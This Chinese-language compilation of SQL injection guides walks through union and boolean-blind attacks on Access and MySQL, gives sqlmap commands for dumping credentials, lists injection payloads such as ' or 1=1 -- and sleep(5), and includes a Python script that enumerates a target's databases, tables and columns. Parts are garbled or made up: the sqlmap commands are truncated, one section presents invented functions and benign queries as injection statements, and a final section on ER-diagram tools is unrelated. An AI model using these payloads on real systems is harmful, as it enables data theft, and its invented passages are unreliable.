十大关系数据库SQL注入工具一览

常见的SQL注⼊⼿法SQL注⼊篇Access数据库简介Access数据库与其他数据库不同，他没有存储的库，所以只能猜表。

Access数据库结构a) 表、字段、数据检测表名是否存在Select ID From Admin where ID = 10 and exists(select * from Admin)Select ID From Admin where ID = 10 and exists(select * from Admin1)联合注⼊语法判断是否存在注⼊AND⽅法，前后判断必须都为trueSelect * From OrderList where ID = 34 and 1=1Select * From OrderList where ID = 34 and 1=2OR⽅法，前后判断⼀边为true即可Select * From OrderList where ID = 3 or 1=1Select * From OrderList where ID = 3 or 1=2判断字段数量Select * From Paydefault where ID = 1 order by 6Select * From Paydefault where ID = 1 order by 7报错，说明只有6个字段根据表查询数据Select * From Paydefault where ID = 1 and 1=2 union select 1,2,3,4,5,6 from PaydefaultFrom 后⾯的表名如果不对会报错，可以⽤来猜测表名数据回显Select * From Paydefault where ID = 1 and 1=2 union select 1,Paytype,3,4,5,6 from Paydefault布尔盲注利⽤ascii码来猜解字段值⾸先判断是否存在表名：And exists(select * from admin)不会报错，说明admin表是存在的，接下来就查列可以使⽤字典+⼯具去枚举列名如果列不存在，则会报错列存在返回正常知道了列之后，就可以去猜解zidu字段⾸先需要知道字段的长度，可以使⽤top len 函数Select * from admin where id = 1 and (select top 1 len(username) from admin)>1这句话的的意思很简单，id = 1之后是可控的内容，然后and⼀个判断true=true为true相反true=false为false，可控的内容使之我们的条件语句成⽴。

常见sql注⼊的类型这⾥只讲解sql注⼊漏洞的基本类型，代码分析将放在另外⼀篇帖⼦讲解⽬录最基础的注⼊-union注⼊攻击Boolean注⼊攻击-布尔盲注报错注⼊攻击时间注⼊攻击-时间盲注堆叠查询注⼊攻击⼆次注⼊攻击宽字节注⼊攻击base64注⼊攻击cookie注⼊攻击-http请求头参数注⼊XFF注⼊攻击-http请求头参数注⼊知道绝对路径的注⼊0x01最基础的注⼊-union注⼊攻击1. 判断是get型还是post型注⼊；2. 找到正确的闭合规则；3. order by 查询字段数；4. union select 1,2.....查看显⽰位是第⼏位，没有的话就试试把id=1的显⽰位让出来，让其等于id=-1；5. 第⼆、三位显⽰出来了，那么即可在这两个位置写⼊sql语句；6. 查询当前数据库,当前mysql⽤户 union select 1,user(),database()；7. 查询当前数据库⾥⾯的表 union select 1,2,group_concat(table_name) from information_schema.tables wheretable_schema="data_name";8. 查询到敏感表名user，继续查询表⾥⾯的字段 union select 1,2,group_concat(column_name) from information_schema.columnswhere table_name="user";9. 查询字段，例如“id”、"passwd"的内容 union select 1,id,passwd from user;10. 拿到⽤户、密码登⼊后台。

0x02 Boolean注⼊攻击-布尔盲注查看现象，能报错，但没有报错信息，正确查询也显⽰不了查询内容就属于布尔盲注，只存在两种状态，对或错；由页⾯的两种不同返回的状态来判定我们的闭合规则；为了⽅便，我们这⾥假设返回正确⽤“yes”，返回错误⽤“no”来表⽰这两种状态找到闭合规则后，我们在闭合规则⾥⾯ and 1=1 和 and 1=2 测试⼀下，看看最后返回是不是两种状态；布尔盲注要⽤到length()和substr()语句，⽤两种状态来猜解数据库、表名等的长度和正确字母；先⽤ and length(database())>2来猜数据库的长度，使⽤的是⼆分法；再⽤ and substr(database(),1,1)='t'来确定第⼀个字母，可⽤burp跑，26个字母,哪个字母返回yes则代表第⼀个字母就是它；and substr(database(),2,1)='t' 代表当前数据库的第⼆个字母；最后结合长度，成功的将数据库猜解出来；后⾯的操作跟union注⼊的步骤差不多了，只是sql语句写在上⽂的 database() 处。

sqlmap注入语句
SQL注入是一种常见的Web应用程序漏洞，它允许攻击者通过在用户输入中注入恶意SQL代码来执行非授权的数据库操作。

SQLMap是一款常用的自动化SQL注入工具，它可以帮助攻击者发现和利用SQL注入漏洞。

以下是一些使用SQLMap进行注入的示例语句：
1. 发现注入漏洞：
sqlmap -u " dbs
该命令将对给定的URL进行检测，找到可能的数据库，如MySQL、Oracle等。

2. 查看数据库信息：
sqlmap -u " -D database_name tables
该命令将列出指定数据库中的所有表。

3. 查看表内容：
sqlmap -u " -D database_name -T table_name dump
该命令将显示指定表中的数据。

4. 提取数据库中所有的用户名和密码：
sqlmap -u " -D database_name -T table_name -C "username,password" dump
该命令将从指定表中提取用户名和密码字段的内容。

以上是一些常见的SQLMap注入语句示例，具体的使用方法可以根据具体的情况和需要进行调整。

sql注入测试用例SQL注入是一种常见的网络攻击方式，攻击者通过在输入框中注入恶意的SQL代码，从而获取数据库中的敏感信息或者控制数据库。

为了防止SQL注入攻击，我们需要对输入的数据进行严格的过滤和验证。

下面是一些常见的SQL注入测试用例，可以用来测试系统的安全性。

1. 基本的SQL注入测试用例在输入框中输入以下内容，看是否能够成功执行SQL注入攻击：' or 1=1 --如果系统没有对输入的数据进行过滤和验证，那么这个SQL注入攻击就会成功，因为这个SQL语句的含义是选择所有的数据。

2. UNION注入测试用例在输入框中输入以下内容，看是否能够成功执行UNION注入攻击：' union select 1,2,3 --如果系统没有对输入的数据进行过滤和验证，那么这个UNION注入攻击就会成功，因为这个SQL语句的含义是将两个查询结果合并在一起。

3. 布尔盲注测试用例在输入框中输入以下内容，看是否能够成功执行布尔盲注攻击：' and 1=2 union select 1,2,3 --如果系统没有对输入的数据进行过滤和验证，那么这个布尔盲注攻击就会成功，因为这个SQL语句的含义是选择一个不存在的数据。

4. 时间盲注测试用例在输入框中输入以下内容，看是否能够成功执行时间盲注攻击：' and sleep(5) --如果系统没有对输入的数据进行过滤和验证，那么这个时间盲注攻击就会成功，因为这个SQL语句的含义是让系统等待5秒钟。

5. 堆叠查询测试用例在输入框中输入以下内容，看是否能够成功执行堆叠查询攻击：'; select * from users; --如果系统没有对输入的数据进行过滤和验证，那么这个堆叠查询攻击就会成功，因为这个SQL语句的含义是执行两个查询语句。

总之，SQL注入是一种非常危险的网络攻击方式，可以导致系统的数据泄露和被控制。

为了保护系统的安全，我们需要对输入的数据进行严格的过滤和验证，避免恶意的SQL注入攻击。

如何编写⼀个SQL注⼊⼯具0x01 前⾔ ⼀直在思考如何编写⼀个⾃动化注⼊⼯具，这款⼯具不⽤太复杂，但是可以⽤最简单、最直接的⽅式来获取数据库信息，根据⾃定义构造的payload 来绕过防护，这样⼦就可以。

0x02 SQL注⼊⼯具A、联合查询union select 实现起来最为简单，报错注⼊的实现⽅式也基本⼀致，主要思路：获取所有数据库名--选择数据库--查看这个数据库下所有表---选择表--查询这个表下所有列名。

代码详情：#! /usr/bin/env python# _*_ coding:utf-8 _*_import requestsimport urllibimport revalues={}def get(url,values):data = urllib.urlencode(values)geturl = url+'?'+dataresponse = requests.get(geturl)result=response.contentfind_list=re.findall(r"qwe~(.+?)~qwe", result)if len(find_list)>0:return find_listdef get_database_name(url):values['id'] = "1 and 1=2 union select 1,concat(0x7177657E,schema_name,0x7E717765) from INFORMATION_SCHEMA.SCHEMATA"name_list=get(url,values)print 'The databases:'for i in name_list:print i+"",print "\n"def table_name(url):database_name=raw_input('please input your database:')values['id'] = "1 union select 1,concat(0x7177657E,table_name,0x7E717765) from information_schema.tables where table_schema="+"'"+database_name+"'"name_list=get(url,values)print 'The table is :'for i in name_list:print i+"",print "\n"def column_name(url):table_name=raw_input('please input your table:')values['id'] = "1 union select 1,concat(0x7177657E,column_name,0x7E717765) from information_schema.columns where table_name="+"'"+table_name+"'"name_list=get(url,values)print 'The column is :'for i in name_list:print i+"",if __name__ == '__main__':url='http://192.168.106.130/config/sql.php'get_database_name(url)table_name(url)column_name(url)View Code运⾏效果：B、盲注 盲注的脚本，但总感觉代码不过简洁，越简单越好，可以把局部代码直接拿出来⽤，简单修改payload就可以获取数据，基于布尔盲注，GET，写的⼀个简单的注⼊脚本。

常用SQL注入概述SQL注入是一种让攻击者能够在应用程序中执行恶意的SQL语句的漏洞类型。

通过在用户输入中注入恶意的SQL代码，攻击者可以绕过应用程序的安全验证，获取到敏感数据、修改数据甚至控制数据库服务器。

由于SQL注入是一种常见且易于利用的漏洞，开发人员需要了解并采取相应的防御措施。

本文将深入探讨常用的SQL注入技术，包括基于错误的注入、基于联合查询的注入和基于时间延迟的注入等，并介绍相应的防御方法。

常见的SQL注入技术1. 基于错误的注入基于错误的注入是最常见的SQL注入技术之一。

攻击者通过在用户输入中注入特定的SQL代码来触发应用程序生成错误消息，从而获取到关键信息。

以下是一些常见的基于错误的注入技术：•’ OR ‘1’=‘1’–：这是一种简单的注入技术，通过在输入框中输入该代码，攻击者可以绕过登录验证，获取到全部用户的信息。

•’ UNION SELECT null,username||password,null,null,null FROM users–：通过联合查询注入，攻击者可以获取到用户表中的用户名和密码等重要信息。

2. 基于联合查询的注入基于联合查询的注入是一种高级的SQL注入技术。

攻击者利用应用程序中存在的联合查询漏洞，执行恶意的SQL代码，并通过返回结果获得敏感信息。

以下是一些常见的基于联合查询的注入技术：•’ UNION SELECT 1,2,3,4,5–：通过联合查询注入获取列数，攻击者可以根据返回结果调整注入代码，进一步获取数据。

•’ UNION SELECT null,table_name,null,null,null FROMinformation_schema.tables–：通过联合查询获取数据库中的表名，攻击者可以进一步获取数据库结构信息。

3. 基于时间延迟的注入基于时间延迟的注入是一种高级的SQL注入技术，攻击者利用应用程序在执行查询时的延迟来判断注入是否成功。

常用sql注入语句SQL注入是一种常见的Web安全漏洞,黑客可以利用它向服务器发送恶意SQL查询语句,从而获取敏感信息,如用户凭证、信用卡信息等。

以下是一些常用的SQL注入语句:1. `sql_过滤函数()`:向服务器发送一个包含过滤函数的SQL查询语句,从而允许黑客执行任意SQL操作。

例如:```SELECT * FROM users WHERE age > 18;```2. `sql_ between()`:向服务器发送一个包含between子句的SQL查询语句,允许黑客执行任意SQL操作,例如修改用户记录。

例如: ```SELECT * FROM users WHERE年龄 between 18 and 25;```3. `sql_ like()`:向服务器发送一个包含like子句的SQL查询语句,允许黑客执行任意SQL操作,例如查找用户。

例如:```SELECT * FROM users WHERE name like "%admin%";```4. `sql_及物函数()`:向服务器发送一个包含及物函数(比如*)的SQL查询语句,允许黑客执行任意SQL操作。

例如:```SELECT * FROM users WHERE name LIKE "%admin%" AND password LIKE "%admin%";```5. `sql_拼接函数()`:向服务器发送一个包含拼接函数的SQL查询语句,允许黑客执行任意SQL操作。

例如:```SELECT * FROM users WHERE name = "admin" AND password = "123456";```这些语句只是SQL注入漏洞中的一部分,黑客还可以使用更高级的技巧来欺骗服务器,获取更多的敏感信息。

因此,防止SQL注入的最佳方法是采取各种安全措施,例如使用安全的API接口、对输入数据进行过滤和验证、使用安全的密码策略等。

sql注入常用命令在SQL注入攻击中，攻击者可以使用一些常用的命令来利用应用程序的漏洞，获取非授权的访问或篡改数据。

以下是一些常见的SQL注入攻击命令：1. UNION注入：用于合并两个查询的结果集。

示例：SELECT column1, column2 FROM table1 UNION SELECT column1, column2 FROM table22. SELECT注入：用于绕过认证或获取敏感信息。

示例：SELECT * FROM users WHERE username = 'admin' AND password = ' ' OR '1'='1'3. UPDATE注入：用于修改数据。

示例：UPDATE users SET password = 'newpassword' WHERE username = 'admin'4. INSERT注入：用于插入恶意数据。

示例：INSERT INTO users (username, password) VALUES ('attacker', 'password'); SELECT * FROM users WHERE username='attacker'5. DELETE注入：用于删除数据。

示例：DELETE FROM users WHERE username = 'admin'6. DROP注入：用于删除表或数据库。

示例：DROP TABLE users; DROP DATABASE dbname7. 注释符号（--）：用于注释原始查询或绕过后续语句。

示例：SELECT * FROM users WHERE username = 'admin' --' AND password = 'password'。

SQL注入是一种常见的网络攻击手段，以下是一些常见的SQL注入手法：
1. 报错注入：这种类型的注入是通过在查询中添加额外的SQL语句，以尝试在应用程序中引发错误，从而泄露数据库的一些敏感信息。

2. 联合注入：这种类型的注入利用了数据库的联合查询功能。

攻击者可以构造一个包含SQL语句的查询，通过这个语句，他们可以获取到一些原本无法直接访问的数据。

3. 布尔型注入：这种类型的注入是通过在查询中添加逻辑运算符（如AND、OR），以尝试改变查询的逻辑，从而获取到更多的数据。

4. 转义注入：这种类型的注入是通过在查询中添加转义字符，以尝试改变查询的语义，从而获取到更多的数据。

5. 堆叠注入：这种类型的注入是通过在查询中添加多个SQL语句，以尝试在单个查询中执行多个操作，从而获取到更多的数据。

6. 盲注：这种类型的注入是通过在查询中添加循环语句，以尝试逐步获取数据库中的数据。

由于这种类型的注入不需要知道数据库的具体结构，因此它是一种非常有效的攻击手段。

这些只是SQL注入的一部分手法，攻击者也在不断地进行创新和发展新的攻击手段。

因此，对于任何应用程序来说，保护其免受SQL注入攻击都是一项重要的任务。

梳理数据库表关系的工具
梳理数据库表关系是数据管理和开发中非常重要的一环，需要通过一定的工具来实现。

这些工具可以帮助我们清晰地了解数据库中各个表的结构和关系，从而更好地进行数据建模、查询和分析。

常用的梳理数据库表关系的工具包括：
1. 数据库设计工具：比如ERWin、PowerDesigner等。

这些工具可以用来绘制数据库ER图，从而帮助我们更好地理解表之间的关系。

2. 数据库管理工具：比如MySQL Workbench、Navicat等。

这些工具可以帮助我们浏览数据库中的表结构，查看表之间的外键约束，进行数据导入导出等操作。

3. 数据库查询工具：比如SQL Server Management Studio、Oracle SQL Developer等。

这些工具可以帮助我们通过SQL语句来查询数据库中的数据，进一步了解表之间的关系。

除了以上列举的工具，还有一些比较专业的数据库分析工具，比如Tableau、QlikView等，可以帮助我们通过可视化的方式来分析数据库中的数据，发现数据间的模式和趋势。

总之，选择什么样的工具梳理数据库表关系，要根据自己的实际需求和所用数据库的类型来决定。

无论用哪种工具，都需要结合实际情况进行灵活运用，才能达到最佳效果。

- 1 -。